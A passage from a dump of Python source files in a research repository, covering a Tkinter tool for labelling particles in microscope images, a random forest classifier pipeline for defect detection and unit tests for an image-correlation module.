rez\n data.labels.pop()\n data.labels.append('no')\n if (event.char == \"o\"): #this marks particle as found but not atomic rez for use if accidently marked\n data.labels.pop()\n data.labels.append('null')\n if (event.char == \"c\"): #this means there is a stacking fault on the edge\n data.labels.pop()\n data.labels.append('surfaceSF')\n if (event.char == \"f\"): #this means there is an edge dislocation\n data.labels.pop()\n data.labels.append('edgeDislcn')\n if event.keysym == \"bracketright\":\n data.fileCounter += 1\n if data.fileCounter == len(files):\n print('No more images to look at!')\n quitGui(root)\n else:\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n if event.keysym == \"bracketleft\":\n data.fileCounter -= 1\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n if event.keysym == \"Return\":\n saveLabel(files,data)\n data.fileCounter += 1\n if data.fileCounter == len(files):\n print('No more images to look at!')\n quitGui(root)\n else:\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n txtpath = data.directory + \"/*.txt\"\n txtfiles = glob.glob(txtpath)\n data.textFilesCounter = len(txtfiles)\n data.textnames = [name.split('/')[-1].split('.')[0] for name in txtfiles]\n if (event.char == \"q\"):\n quitGui(root)\ndef shiftEKeyPressed(event, data,files,root):\n data.radius += 20\n data.radii.pop()\n data.radii.append(data.radius)\n\ndef shiftDKeyPressed(event, data,files,root):\n data.radius -= 20\n data.radii.pop()\n data.radii.append(data.radius)\n\n\ndef redrawAll(canvas, data):\n #draw the photo\n canvas.create_image(0,0,image = data.photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n if (len(data.radii) > 0):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n else:\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radius, cy+data.radius, fill=None, outline = \"magenta\")\n # draw the text\n for idx,center in enumerate(data.circleCenters):\n canvas.create_text(center[0], center[1]-(data.radii[idx]+5),activefill = 'magenta',fill = 'black', font = ('Helvetica', '18','bold'),text=data.labels[idx])\n if data.weird == 'Weird Data':\n canvas.create_text(5, data.height-10, activefill = None, fill = 'magenta', font = ('Helvetica', '20','bold'), text = 'W')\n\ndef quitGui(root):\n print('Quiting...')\n root.destroy()\n###############\n#Main Function to run GUI\n###############\n\ndef run():\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data, scrollbar):\n mousePressed(event, data, canvas, scrollbar)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas,data,files,root):\n keyPressed(event, data,files,root)\n if data.fileCounter < len(files):\n redrawAllWrapper(canvas, data)\n else:\n pass\n def shiftEKeyPressedWrapper(event, canvas, data,root):\n shiftEKeyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n def shiftDKeyPressedWrapper(event, canvas, data,root):\n shiftDKeyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n # Set up data structure\n class Struct(object): pass\n\n #initialize all the required data\n data = Struct()\n data.radius = 50\n data.fileCounter = 0\n init(data)\n print('shift+click to select particle','\\n', 'arrow keys move circle','\\n', '\"e\" enlarges circle, \"d\" decreases circle', '\\n', '\"y\" to label stacking fault','\\n', '\"n\" to label no visible stacking fault','\\n', '\"o\" if only one plane of particle is resolved','\\n', 'hit enter to continue to next image', '\\n', '\"q\" quits program')\n\n\n #run the main image labeling gui\n root = Tk()\n files, textfiles, data.directory = getFiles(root)\n data.textFilesCounter = len(textfiles)\n data.textnames = [name.split('/')[-1].split('.')[0] for name in textfiles]\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n data.width = 1024\n data.height = 1024\n data.weird = 'not weird'\n\n # create the root and the canvas\n canvas = Canvas(width=data.width, height=data.height)\n\n\n #Create scrollbar\n scrollbar = Scrollbar(root)\n scrollbar.config(command = canvas.yview)\n scrollbar.pack(side = RIGHT, fill = Y)\n canvas.config(yscrollcommand = scrollbar.set)\n canvas.pack(side = LEFT, expand = True, fill = 'both')\n canvas.create_image(0,0,image = data.photo, anchor = \"nw\")\n canvas.config(scrollregion = canvas.bbox(ALL))\n\n # set up events\n root.bind(\"<Shift-Button-1>\", lambda event:\n mousePressedWrapper(event, canvas, data,scrollbar))\n root.bind(\"<Shift-Up>\", lambda event:\n shiftEKeyPressedWrapper(event, canvas, data,root))\n root.bind(\"<Shift-Down>\", lambda event:\n shiftDKeyPressedWrapper(event, canvas, data,root))\n root.bind_all(\"<Key>\", lambda event:\n keyPressedWrapper(event, canvas, data,files,root))\n\n if data.fileCounter < len(files):\n redrawAll(canvas, data)\n root.mainloop()\n else:\n pass\n\n # and launch the app\n #root.mainloop() # blocks until window is closed\n print(\"bye!\")\n print(data.circleCenters,data.radii, data.labels)\n\nrun()\n" }, { "alpha_fraction": 0.5358032584190369, "alphanum_fraction": 0.5918430685997009, "avg_line_length": 38.654319763183594, "blob_id": "043c7a248bbfa989b3c17353db1363da1854b090", "content_id": "c6e175d506dcc622cad8ac95350abd71969f7cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3212, "license_type": "no_license", "max_line_length": 66, "num_lines": 81, "path": "/image_processing/preprocess_synth_data.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom glob import glob\nfrom ncempy.io import dm\nfrom matplotlib.image import imsave\nfrom matplotlib import cm\nfrom skimage import transform\nfrom skimage import exposure\nfrom ast import literal_eval\nimport shutil\nfrom skimage import io\nfrom scipy.io import loadmat\n\n\ndef loadData(directory, if_save = False, selectImages = None):\n matFiles = glob(directory+'/*.mat')\n if selectImages == None:\n split = int(len(matFiles)*0.75)\n else:\n split = int(selectImages*0.75)\n print('split is:', split)\n trainX = []\n trainY = []\n testX = []\n testY = []\n for file in matFiles[:split]:\n struct = loadmat(file)\n img = struct['sField']['imagesOutput'][0][0]\n mask = struct['sField']['locationParticles'][0][0]\n img = img.reshape(img.shape+ (1,)).astype('float32')\n mask = mask.reshape(img.shape+ (1,)).astype('float32')\n trainX.append(np.copy(img[:512,:512]))\n trainX.append(np.copy(img[512:,:512]))\n trainX.append(np.copy(img[:512,512:]))\n trainX.append(np.copy(img[512:,512:]))\n trainY.append(np.copy(mask[:512,:512]))\n trainY.append(np.copy(mask[512:,:512]))\n trainY.append(np.copy(mask[:512,512:]))\n trainY.append(np.copy(mask[512:,512:]))\n trainX = np.asanyarray(trainX)\n trainY = np.asanyarray(trainY)\n\n if selectImages == None:\n for file in matFiles[split:]:\n struct = loadmat(file)\n img = struct['sField']['imagesOutput'][0][0]\n mask = struct['sField']['locationParticles'][0][0]\n img = img.reshape(img.shape+ (1,)).astype('float32')\n mask = mask.reshape(img.shape+ (1,)).astype('float32')\n testX.append(np.copy(img[:512,:512]))\n testX.append(np.copy(img[512:,:512]))\n testX.append(np.copy(img[:512,512:]))\n testX.append(np.copy(img[512:,512:]))\n testY.append(np.copy(mask[:512,:512]))\n testY.append(np.copy(mask[512:,:512]))\n testY.append(np.copy(mask[:512,512:]))\n testY.append(np.copy(mask[512:,512:]))\n else:\n for file in matFiles[split:selectImages]:\n struct = loadmat(file)\n img = struct['sField']['imagesOutput'][0][0]\n mask = struct['sField']['locationParticles'][0][0]\n img = img.reshape(img.shape+ (1,)).astype('float32')\n mask = mask.reshape(img.shape+ (1,)).astype('float32')\n testX.append(np.copy(img[:512,:512]))\n testX.append(np.copy(img[512:,:512]))\n testX.append(np.copy(img[:512,512:]))\n testX.append(np.copy(img[512:,512:]))\n testY.append(np.copy(mask[:512,:512]))\n testY.append(np.copy(mask[512:,:512]))\n testY.append(np.copy(mask[:512,512:]))\n testY.append(np.copy(mask[512:,512:]))\n testX = np.asanyarray(testX)\n testY = np.asanyarray(testY)\n if if_save == True:\n np.save('trainSynthImages.npy',trainX)\n np.save('trainSynthMasks.npy',trainY)\n np.save('testSynthImages.npy',testX)\n np.save('testSynthMasks.npy',testY)\n return trainX, trainY, testX, testY\n" }, { "alpha_fraction": 0.6094784736633301, "alphanum_fraction": 0.6261470317840576, "avg_line_length": 42.04499816894531, "blob_id": "df0eee01b4950d677a2197ed1fd531e2d5afe4eb", "content_id": "e0792376ea872e8f140b9d4bbce1cb2bbe9b3252", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17218, "license_type": "no_license", "max_line_length": 129, "num_lines": 400, "path": "/classfier_builds/rf_classifier.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage import io\nfrom skimage.color import rgb2gray\nimport os\nimport skimage.feature\nimport skimage.filters\nimport skimage.color\nfrom skimage.util import invert\nfrom skimage.morphology import skeletonize\nfrom scipy.signal import correlate2d\nimport pandas as pd\n# import cv2\nfrom pathlib import Path\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.externals import joblib\nfrom sklearn import model_selection\nimport logging\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sns\nfrom glob import glob\nimport shutil\nfrom ast import literal_eval\nfrom skimage.feature import blob_dog, blob_log, blob_doh\n\ndef file_relabel(og_dir, new_dir):\n \"\"\"Takes the old directory with a bunch of from microscope file and moves\n the pngs and txt files to the unified random forest data directory. While\n doing this it renames the files to include the experiment date in the\n filename.\"\"\"\n dir_list = os.listdir(og_dir)\n print(dir_list)\n skip_count = 0\n for direct in dir_list:\n if direct == '.DS_Store':\n pass\n else:\n pngs = glob(og_dir+'/'+direct+'/*/adjustedPNG2/*.png')\n print(len(pngs))\n txts = glob(og_dir+'/'+direct+'/*/adjustedPNG2/*.txt')\n print(len(txts))\n for idx, txt in enumerate(txts):\n txtname = txt.split('.')[0].split('/')[-1]\n newname = direct+'_'+txtname\n if txtname == pngs[idx].split('.')[0].split('/')[-1]:\n shutil.copy2(txt,new_dir+'/'+newname+'.txt')\n shutil.copy2(pngs[idx],new_dir+'/'+newname+'.png')\n else:\n if txtname == pngs[skip_count+idx+1].split('.')[0].split('/')[-1]:\n shutil.copy2(txt,new_dir+'/'+newname+'.txt')\n shutil.copy2(pngs[idx],new_dir+'/'+newname+'.png')\n skip_count += 1\n else:\n pass\n print('done')\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n labels = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n if 'Weird' in txt[0].split(' ')[0]:\n weird = txt[0]\n else:\n weird = 'Not Weird Data'\n weird_stop = txt.index('Particle Location:')\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n defect_stop = txt.index('Image Size:')\n for loc in txt[weird_stop+1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n for loc in txt[radius_stop+1:defect_stop]:\n labels.append(loc)\n return(centers, radii,labels, weird)\n\ndef rf_label_reader(txt_file, image_file, use_weird = True):\n \"\"\"Reads in text file and associated image file and using the information in the text file\n makes an array of labels and saves the associated region of the image corrsponding to that label\n to create training and testing data for random forest creation\"\"\"\n image = io.imread(image_file, as_grey = True)\n #test for 1024x1024 image\n if image.shape != (1024,1024):\n raise RuntimeError('Image is not required shape: 1024x1024')\n\n #setup required variables\n image_cuts = []\n empty_count = 0 #how many image cuts generated with the label empty meaning no particle present\n null_count = 0 #how many image cuts generated with the label null meaning particle present but not atomic resolution\n no_count = 0 #how many image cuts generated with the label no meaning particle present, atomic res, no defect\n yes_count = 0 #how many image cuts generated with the label yes meaning particle present, atomic res, has defect\n\n #read text file\n centers, radii, labels, weird = txt_reader(txt_file)\n\n #determine whether to include weird data in the dataset\n if use_weird == False:\n if weird == 'Weird Data':\n return 'skip', 'skip', 'skip', 'skip', 'skip', 'skip'\n\n #create image and label pair\n if len(centers) == 0: #ID if there are no particles present in text file\n for x in range(0,4*256,256):\n for y in range(0,4*256,256):\n image_slice = image[x:x+256,y:y+256]\n image_cuts.append(image_slice)\n labels.append('empty')\n empty_count += 1\n else:\n for idx, loc in enumerate(labels):\n if loc == 'null':\n null_count += 1\n if loc == 'no':\n no_count += 1\n if loc == 'yes':\n yes_count += 1\n if loc == 'edgeDislcn':\n yes_count += 1\n labels[idx] = 'yes'\n if loc == 'surfaceSF':\n yes_count += 1\n labels[idx] = 'yes'\n\n for idx, center in enumerate(centers): #slice up image to create images to feed into\n x_min = center[0]-radii[idx]-2\n x_max = center[0]+radii[idx]+2\n y_min = center[1]-radii[idx]-2\n y_max = center[1]+radii[idx]+2\n if x_min < 0:\n x_min = 0\n if y_min < 0:\n y_min = 0\n if x_max > 1023:\n x_max = 1023\n if y_max > 1023:\n y_max = 1023\n image_slice = image[int(y_min):int(y_max), int(x_min):int(x_max)]\n image_cuts.append(image_slice)\n\n return labels, image_cuts, empty_count, null_count, no_count, yes_count\n\ndef rotate(df):\n \"\"\"Function to rotate non-null images in order to augment data\"\"\"\n rot_dir = {'filename':[],'label':[]}\n for idx, label in enumerate(df['label']):\n if label == 'null':\n pass\n else:\n image = io.imread(df['filename'][idx])\n name = df['filename'][idx].split('.')[0]\n for count in np.arange(1,4):\n rot_img = np.rot90(image,count)\n rot_dir['filename'].append(name+'rot'+str(count)+'.png')\n rot_dir['label'].append(label)\n try:\n plt.imsave(name+'rot'+str(count)+'.png',rot_img,cmap = 'gray')\n except:\n pass\n df2 = pd.DataFrame(data = rot_dir)\n df = df.append(df2)\n print('Done!')\n return df\n\ndef rf_data_pipeline(directory, use_weird = True):\n \"\"\"Wrapper function to run through directories of labels and images to create random forest\n training and testing set. Returns a pandas dataframe with all the labels and associated image file names\"\"\"\n #set up required variables\n txt_list = glob(directory+'*/*.txt')\n image_list = glob(directory+'*/*.png')\n # if os.path.isdir(directory+'/text_files') == False:\n # raise RuntimeError('No text file directory present.')\n # if os.path.isdir(directory+'/images') == False:\n # raise RuntimeError('No image file directory present.')\n if len(txt_list) == 0:\n raise RuntimeError('No txt label files')\n if len(image_list) == 0:\n raise RuntimeError('No image files')\n txt_name_list = [name.split('/')[-1].split('.')[0] for name in txt_list]\n image_name_list = [name.split('/')[-1].split('.')[0] for name in image_list]\n data = {'filename':[],'label':[]}\n total_empty_count = 0\n total_null_count = 0\n total_no_count = 0\n total_yes_count = 0\n if os.path.isdir(directory+'/old_text_files') == False:\n os.mkdir(directory+'/old_text_files')\n if os.path.isdir(directory+'/old_images') == False:\n os.mkdir(directory+'/old_images')\n if os.path.isdir(directory+'/labeled_images') == False:\n os.mkdir(directory+'/labeled_images')\n\n #test for correct images and labels\n if txt_name_list != image_name_list:\n raise RuntimeError('Names of txt label files do not match names of image files.')\n\n #create dataframe of files and labels\n for idx, txt in enumerate(txt_list):\n labels, image_cuts, empty_count, null_count, no_count, yes_count = rf_label_reader(txt, image_list[idx], use_weird)\n if labels == 'skip':\n continue\n total_empty_count += empty_count\n total_null_count += null_count\n total_no_count += no_count\n total_yes_count += yes_count\n for idx2, label in enumerate(labels):\n data['label'].append(label)\n rf_data_fname = directory+'/labeled_images/'+image_name_list[idx]+ '_'+ label + '_' + str(idx2) +'.png'\n plt.imsave(rf_data_fname,image_cuts[idx2], cmap='gray')\n data['filename'].append(rf_data_fname)\n shutil.move(txt,directory+'/old_text_files/')\n shutil.move(image_list[idx],directory+'/old_images/')\n df = pd.DataFrame(data = data)\n print(df['label'].iloc[0])\n df = rotate(df)\n df.to_csv(directory+'/rf_data.csv')\n print('done!')\n print('empty: {}, null: {}, no: {}, yes {}'.format(total_empty_count*4, total_null_count,total_no_count*4,total_yes_count*4))\n return df, (total_empty_count, total_null_count, total_no_count, total_yes_count)\n\n\ndef sobel_edges(gray_image):\n \"\"\"Returns histogram of edges\"\"\"\n edges = skimage.filters.sobel(gray_image)\n edge_hist = np.histogram(edges.flatten(),bins=50, density = True)[0]\n return edge_hist\n\ndef blobs_log(gray_image):\n \"\"\"returns two features: average blob size and total number of blobs detected by laplace of gaussians\"\"\"\n blob = skimage.feature.blob_log(gray_image,max_sigma=2, num_sigma=30, threshold=.2)\n blobs = blob[:,2]\n num_blobs = len(blobs)\n if num_blobs == 0:\n avg_blob = 0\n else:\n avg_blob = blobs.mean()\n blob_info = np.array([avg_blob, num_blobs])\n return blob_info\n\ndef fft_hist(gray_image):\n \"\"\"returns 20 bin histogram of frequencies from fft of image\"\"\"\n fft = np.log2(abs(np.fft.rfft2(gray_image)))\n fhist = np.histogram(fft,bins=20,density = True)[0]\n return fhist\n\ndef center_cut(image):\n \"\"\"returns a 1d array of length 400 which is 20x20 center of the image\"\"\"\n middle = (image.shape[0]//2,image.shape[1]//2)\n cut = image[(middle[0]-10):(middle[0]+10),(middle[1]-10):(middle[1]+10)].ravel()\n return cut\n\ndef lbp_cut(gray_image):\n \"\"\"returns a 1d array of length 400 which is 20x20 center of the lbp\"\"\"\n lbp = skimage.feature.local_binary_pattern(gray_image,2,16)\n middle = (lbp.shape[0]//2,lbp.shape[1]//2)\n lbp = lbp[(middle[0]-10):(middle[0]+10),(middle[1]-10):(middle[1]+10)].ravel()\n return lbp\n\ndef gray_range(image):\n \"\"\"gives the mean and standard deviation for the image\"\"\"\n irange = np.array([image.mean(),image.std()])\n return irange\n\ndef get_features(file, label):\n \"\"\"Function takes in a file name from list of files, opens it, creates a gray version for features which require\n gray image and then creates a list of features as well as a label which is then returned\"\"\"\n image = io.imread(file, as_grey=True)\n features = []\n features.append(center_cut(image))\n features.append(lbp_cut(image))\n features.append(fft_hist(image))\n features.append(blobs_log(image))\n features.append(sobel_edges(image))\n features.append(gray_range(image))\n features = np.concatenate(features)\n return (features,label)\n\ndef feature_frame(file_label_df):\n \"\"\"Creates a pandas dataframe with all the calculated features for all the images in a given dataframe which\n contains all the images file names and labels.\"\"\"\n features = [get_features(file, file_label_df['label'].iloc[idx]) for idx,file in enumerate(file_label_df['filename'])]\n print('Done!')\n feat_list, labels_list = zip(*features)\n df = pd.DataFrame.from_records(feat_list)\n column_names = [['center_cut']*400,['lbp_cut']*400,\\\n ['fft_hist']*20,['blobs_log']*2,['sobel_edges']*50,['mean'],['std']]\n column_names = sum(column_names, [])\n df.columns = column_names\n df['Label'] = labels_list\n return df\n\ndef balance_data_classes(df,total_empty_count, total_null_count, total_no_count, total_yes_count):\n \"\"\"Create two balanced dataframes of features with an equal number of each class, one with 80% of the data\n the other with 20% of the data\"\"\"\n train_cutoff = int(np.array([total_empty_count, total_null_count, total_no_count, total_yes_count]).min()*0.7)\n validate_cutoff = int(np.array([total_empty_count, total_null_count, total_no_count, total_yes_count]).min()*0.2)\n test_cutoff = int(np.array([total_empty_count, total_null_count, total_no_count, total_yes_count]).min()*0.1)\n #shuffle input dataframe so that you do not end up with the same rotated image several times\n df = shuffle(df, random_state=0)\n bal_df1 = pd.DataFrame(columns=df.columns.values)\n bal_df2 = pd.DataFrame(columns=df.columns.values)\n names_list = df['Label'].drop_duplicates()\n for name in names_list:\n temp = df[df.values == name]\n bal_df1=bal_df1.append(temp.iloc[:cutoff,:])\n bal_df2=bal_df2.append(temp.iloc[cutoff:,:])\n bal_df1 = shuffle(bal_df1, random_state=0)\n bal_df2 = shuffle(bal_df2, random_state=0)\n return bal_df1, bal_df2\n\ndef split_set(train_set,test_set):\n \"\"\"splits training and testing dataframes into feature and label sets\"\"\"\n X_train = train_set.iloc[:,:-1]\n Y_train = train_set.iloc[:,-1]\n X_test = test_set.iloc[:,:-1]\n Y_test = test_set.iloc[:,-1]\n return X_train, Y_train, X_test, Y_test\n\ndef train_random_forest(X_train, Y_train, nestimators = 50,crit='gini',max_feat='auto'):\n \"\"\"function that takes in the training feature set and training labels and trains a radnom forest with\n n estimators given by nestimators\"\"\"\n classifier = RandomForestClassifier(n_estimators= nestimators,criterion= crit,max_features=max_feat)\n classifier.fit(X_train, Y_train)\n return classifier\n\ndef cross_val_stratified(features_df,model,nsplit):\n \"\"\"runs stratified k-fold cross validation where nsplit specifies the number of splits\n and returns the mean and standard deviation of the cross validation score. Based on the code shown in\n class.\"\"\"\n X = features_df.iloc[:,:-1]\n Y = features_df.iloc[:,-1]\n cv = StratifiedKFold(n_splits=nsplit)\n scores = cross_val_score(model, X, Y, cv=cv, n_jobs=-1)\n print(\"mean: {:3f}, stdev: {:3f}\".format(\n np.mean(scores), np.std(scores)))\n\ndef plot_confusion_matrix(X, Y, df, model):\n \"\"\"Creates a confusion matrix for the different classes given a set of features, true labels, the dataset\n and the desired trained classfier\"\"\"\n Y_pred = model.predict(X)\n Y_labels = df['Label'].drop_duplicates()\n cfm = confusion_matrix(Y, Y_pred, labels=Y_labels)\n df_cfm = pd.DataFrame(data = cfm, columns=Y_labels, index=Y_labels)\n plt.subplots(figsize=(5,5))\n ax = sns.heatmap(df_cfm, vmax = 90, annot=True, fmt=\"d\",cmap='rainbow')\n\ndef feature_importance(X_train,classifier):\n \"\"\"Makes a plot of feature importance based of the feature importances calculated by scikit learn.\n Obviously features such as historgrams actually go into the classifier as several features so the function\n adds the importances of each of the features belonging to a certain class of feature\"\"\"\n feat_importance = np.vstack((X_train.columns.values[1:],classifier.feature_importances_[1:]))\n previous = feat_importance[0,0]\n classes = [previous]\n counts = []\n temp_count = 0\n for idx, classify in enumerate(feat_importance[0,:]):\n if classify.split('.')[0] == previous:\n temp_count += feat_importance[1,idx]\n previous = classify.split('.')[0]\n else:\n counts.append(temp_count)\n classes.append(classify)\n temp_count = 0\n temp_count += feat_importance[1,idx]\n previous = classify\n\n counts.append(temp_count)\n fig, ax = plt.subplots()\n plt.bar(np.arange(1,len(classes)+1),counts,tick_label = classes)\n for tick in ax.get_xticklabels():\n tick.set_rotation(80)\n ax.set_xlabel('Feature Class')\n ax.set_ylabel('Feature Importance')\n ax.set_title(\"Feature Importance vs Feature Class\")\n\ndef optimize_model(X_train,Y_train, nestimators = [10,20,30,50,70,100]):\n \"\"\"function which runs model optimization given a certain number of n_estimators, max_features, and criterion\n (gini or entropy)\"\"\"\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s')\n parameters = {'n_estimators':nestimators, 'max_features':[3,8,10,'auto'],\n 'criterion': ['gini','entropy']}\n rf_tune = model_selection.GridSearchCV(RandomForestClassifier(), parameters,\n n_jobs = -1, cv = 5,verbose=1)\n rf_opt = rf_tune.fit(X_train, Y_train)\n print(\"Best zero-one score: \" + str(rf_opt.best_score_) + \"\\n\")\n print(\"Optimal Model:\\n\" + str(rf_opt.best_estimator_))\n return rf_opt\n" }, { "alpha_fraction": 0.5118491053581238, "alphanum_fraction": 0.5535714030265808, "avg_line_length": 37.65806579589844, "blob_id": "26c8362feebc314a5664f3a45d42fa80bb1d84ae", "content_id": "0fe1bcc9515d8c12d50e89db6d25a407337b89ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5992, "license_type": "no_license", "max_line_length": 141, "num_lines": 155, "path": "/image_processing/ncempy/test/test_algo_multicorr.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "'''\nTests for the algo.multicorr module.\n'''\n\nimport unittest\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nfrom io import StringIO\nimport cv2\n\nimport ncempy.algo.multicorr as mc\n\nclass test_shiftedimages(unittest.TestCase):\n \"\"\"Test the multicorr module on two shifted images\"\"\"\n\n def test_parse_input(self):\n '''\n Test to make sure inputs are properly accounted for.\n '''\n\n\n g1 = 1\n g2 = np.zeros([4,4])\n with self.assertRaises(TypeError):\n mc.parse_input(g1, g2) # both must be arrays\n with self.assertRaises(TypeError):\n mc.parse_input(g2, g1)\n\n # tests input sanitation.\n saved_stdout = sys.stdout\n try:\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'dummy', 4)\n output = out.getvalue().strip()\n self.assertEqual(output, 'Unknown method used, setting to cross')\n\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'cross', 23.1)\n output = out.getvalue().strip()\n self.assertEqual(output, 'Upsample factor is not an integer, rounding down')\n\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'cross', -23.1)\n output = out.getvalue().strip()\n self.assertEqual(output, 'Upsample factor is not an integer, rounding down\\nUpsample factor is < 1, setting to 1')\n\n out = StringIO()\n sys.stdout = out\n mc.parse_input(g2, g2, 'cross', 'phase')\n output = out.getvalue().strip()\n self.assertEqual(output, 'Upsample factor is not an integer or float, setting to 1')\n finally:\n sys.stdout = saved_stdout\n\n with self.assertRaises(TypeError):\n mc.parse_input(np.zeros([2,3]), np.zeros([3,2]), 'phase', 1)\n\n with self.assertRaises(TypeError):\n mc.initial_correlation_image(g2, g2, 'tester', 1)\n\n def test_multicorr(self):\n '''\n Test to check if the correlation is working.\n '''\n g2 = np.zeros((3,3))\n test = mc.multicorr(np.fft.fft2(g2), np.fft.fft2(g2), 'phase', 3)\n print(test)\n assert list(test) == [0, 0]\n\n # filename = '/Users/Tom/Downloads/matt_beard.jpg'\n # filename_shifted = '/Users/Tom/Downloads/matt_beard_shifted.jpg'\n # G1 = cv2.imread(filename, 0)\n # G1 = G1[0:100, 0:100]\n G1 = np.zeros((100,100))\n G1[42,35] = 12\n # G2 = cv2.imread(filename_shifted, 0)\n G2 = np.real(np.fft.ifft2(mc.imageShifter(np.fft.fft2(G1), [-30, 10])))\n print(G1.shape, G2.shape)\n # plt.figure(0)\n # plt.imshow(np.concatenate((G1, G2)))\n # plt.show(block = True)\n imageCorr = mc.initial_correlation_image(np.fft.fft2(G1), np.fft.fft2(G2), 'phase', 2)\n\n # test to see if correlation image looks the same\n np.testing.assert_almost_equal(np.exp(1j * np.angle((np.multiply(np.fft.fft2(G2), np.conj(np.fft.fft2(G1)))))), imageCorr, decimal=4)\n\n # plt.figure(1)\n # plt.imshow(np.real(np.fft.ifft2(imageCorr)))\n # plt.show(block = True )\n out_phase = mc.multicorr(np.fft.fft2(G1), (np.fft.fft2(G2)), 'phase', 2)\n self.assertEqual(out_phase, [-30.0, 10.0])\n\n # test cross correlation\n out_cross = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'cross', 1)\n self.assertEqual(out_cross, [-30.0, 10.0])\n\n # test hybrid correlation and dft upsample\n out_hybrid = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'hybrid', 3)\n out_hybrid = list(out_hybrid)\n np.testing.assert_almost_equal(out_hybrid, [-30.0, 10.0], decimal = 6)\n\n # plt.imshow(np.subtract(G1, np.real(np.fft.ifft2(out.G2shift))))\n # plt.show(block = True)\n\n\n def test_different_shifts(self):\n '''\n Tests to check if mod is working correctly\n '''\n # filename = '/Users/Tom/Downloads/matt_beard.jpg'\n # G1 = cv2.imread(filename, 0)\n # G1 = G1[0:501, 0:501]\n G1 = np.zeros((101,101))\n G1[55,55] = 12\n # plt.imshow(G1)\n # plt.show(block = True)\n shifts = [[3., 1.], [-3., -1.], [-3., 1.], [3.,-1.]]\n shifts2 = [[10.3, 14.1], [-10.3, -14.1], [-10.3, 14.1], [10.3,-14.1]]\n for i in shifts:\n # print(i)\n G2 = np.real(np.fft.ifft2(mc.imageShifter(np.fft.fft2(G1), i)))\n # plt.imshow(np.concatenate((G1, G2)))\n # plt.show(block = True)\n with self.subTest(i = i):\n out_phase = mc.multicorr(np.fft.fft2(G1), (np.fft.fft2(G2)), 'phase', 3)\n np.testing.assert_almost_equal(out_phase, i, decimal = 6)\n out_cross = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'cross', 3)\n np.testing.assert_almost_equal(out_cross, i, decimal = 6)\n out_hybrid = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'hybrid', 3)\n out_hybrid = list(out_hybrid)\n np.testing.assert_almost_equal(out_hybrid, i, decimal = 6)\n for i in shifts2:\n # print(i)\n G2 = np.real(np.fft.ifft2(mc.imageShifter(np.fft.fft2(G1), i)))\n with self.subTest(i = i):\n\n out_phase = mc.multicorr(np.fft.fft2(G1), (np.fft.fft2(G2)), 'phase', 10)\n out_phase = list(out_phase)\n np.testing.assert_almost_equal(out_phase, i, decimal = 2)\n\n out_hybrid = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'hybrid', 10)\n out_hybrid = list(out_hybrid)\n np.testing.assert_almost_equal(out_hybrid, i, decimal = 2)\n\n out_cross = mc.multicorr(np.fft.fft2(G1), np.fft.fft2(G2), 'cross', 10)\n out_cross = list(out_cross)\n np.testing.assert_almost_equal(out_cross, i, decimal = 2)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.563124418258667, "alphanum_fraction": 0.5712988376617432, "avg_line_length": 26.524999618530273, "blob_id": "15144ca1154e42d0224000582fc6c2184715f5fe", "content_id": "527e6ebf594510dc943e555cd31b5f99dace5c9a", "detected_licenses": [], "is_generated": false, "is_vendor": 